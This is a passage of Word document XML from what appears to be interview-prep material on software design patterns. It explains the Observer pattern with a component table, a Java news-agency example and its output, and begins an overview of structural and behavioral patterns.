      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A99F35" w14:textId="25C460E2"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21" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54990219" w14:textId="64B40F96" w:rsidR="000D56E3" w:rsidRPr="00CE4B95" w:rsidRDefault="002F47F3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="_Toc197867647"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Observer design pattern</w:t>
      </w:r>
      <w:r w:rsidR="000D56E3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
    </w:p>
    <w:p w14:paraId="5205B05A" w14:textId="76302BEE" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89"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behavioral pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one-to-many dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between objects so that when one object (the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Subject</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) changes its state, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all dependent objects (Observers)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are notified and updated automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B45D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7CEF">
          <v:rect id="_x0000_i2022" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3E89B"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6121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="48227139" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07BF5A6E"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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FCD273"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7D42956" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5E8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ubject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00EE7A3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Maintains a list of observers and notifies them of changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="37B8EF30" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0142A46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74A9F8C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interface to receive updates from the subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="757E5D0D" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CBCD92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Subject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03E4A44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ctual subject that maintains state and notifies observers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="7B8A1B18" w14:textId="77777777" w:rsidTr="00871B89">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BC4BD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Observer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="159B22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the observer interface and updates itself when notified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C3E62A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7ABE1">
          <v:rect id="_x0000_i2023" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C638A"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World Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73634CC4" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1835"/>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YouTube Channel (Subject)</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Subscribers (Observers)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the channel uploads a video, all subscribers are notified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4384FEC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97C0E">
          <v:rect id="_x0000_i2024" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="602EFF05"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA3DC9"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bserver Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20E8C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Observer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458E692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update(String message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03645DE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C740A64"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ubject Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABF682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ubject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0AB6F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attach(Observer o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A210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etach(Observer o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72210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notifyObservers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486AADD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F9BDAD6"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Concrete Subject:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5927136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ort java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1FC064" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2486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Agency implements Subject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40519BE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List&lt;Observer&gt; observers = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7FE2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ews;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E38AC" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6010E6C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setNews(String news) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0372B81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ews = news;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D02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otifyObservers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A9DC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F3931D" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="715FA5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public void attach(Observer o) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6614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add(o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022194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730CBE1" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360A3FB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etach(Observer o) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B4C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remove(o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F40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73DF0DE" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4E599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notifyObservers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF4FF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for (Observer o : observers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AADD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update(news);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002BCA0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F3305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9318E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2E67B2"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oncrete Observer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4D107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Subscriber implements Observer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767CDE1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ame;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F623D01" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66CB1F0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NewsSubscriber(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971932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ame = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352709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5A70E0A" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D273F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update(String news) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7BED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name + " received news update: " + news);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C22395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07FDBD35"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C50597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5. Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21861C4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F894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4B67081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ewsAgency agency = new NewsAgency();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE164C" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139A477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1 = new NewsSubscriber("Subscriber 1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B367C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2 = new NewsSubscriber("Subscriber 2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA04FAD" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1D5D4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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390B7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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E14381" w14:textId="77777777" w:rsidR="00871B89" w:rsidRPr="00FE4147" w:rsidRDefault="00871B89" w:rsidP="00FE4147">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E75F3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setNews("Breaking: Observer pattern explained!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B9E8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63DCF6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4A6FE4"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18EA18">
          <v:rect id="_x0000_i2025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB376FD"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55E896C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1 received news update: Breaking: Observer pattern explained!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE674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2 received news update: Breaking: Observer pattern explained!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FDE89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D97FB9">
          <v:rect id="_x0000_i2026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D0A6B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2C99C893"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vent handling systems (like GUI frameworks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B08B6B"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tification systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E13D71"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al-time feeds (stock price updates, news, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FF136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Observer pattern is effective when you want </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic, real-time updates across multiple objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A12154" w14:textId="2A955B6A"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27" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E7A5C" w14:textId="053946CA" w:rsidR="003C003F" w:rsidRPr="00CE4B95" w:rsidRDefault="003C003F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="434" w:name="_Toc197867648"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Except for the creational design pattern, can you explain other design patterns?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="434"/>
    </w:p>
    <w:p w14:paraId="0DA0B649" w14:textId="47E4D3C9" w:rsidR="002E0126" w:rsidRPr="00FE4147" w:rsidRDefault="002E012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Yes, apart from </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creational Design Patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, there are two other main categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697DD82C"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A0B070">
          <v:rect id="_x0000_i2028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDAFF08"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1. Structural Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7690B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They deal with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object composition</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – how classes and objects are combined to form larger structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9AF999"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9150"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="743357DD" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A664E1B"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1CF2E6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E0EE2FB" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70BEB9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5FE1A1F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the client expects. Example: LegacyRectangleAdapter adapting an old class to a new system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="69D3CC93" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C26B31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03B24A2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parates abstraction from implementation, allowing both to vary independently. Example: Remote control (abstraction) + TV brand (implementation).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="02A738BB" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5C20C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526187E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part-whole hierarchies). Example: Files and folders in a filesystem.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="64FAE80F" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64381DE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57E0C53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 without altering the original class. Example: Wrapping a coffee object with milk and sugar decorators.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="7FA502D5" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A564D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4C193F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ystem. Example: One method hides multiple subsystems like JDBC calls.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="06FE8711" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="786AAB9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F450C8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parts of objects. Example: Characters in a document – only one instance per character.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4147" w:rsidRPr="00FE4147" w14:paraId="33D8BC1C" w14:textId="77777777" w:rsidTr="002E0126">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D90397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50FA77F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placeholder or surrogate for another object to control access. Example: Virtual proxy for lazy loading images.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CB54A4D"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9DA975">
          <v:rect id="_x0000_i2029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F0346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2. Behavioral Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27182C3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se focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>communication between objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE4147">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and responsibility delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6565F6B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275"/>
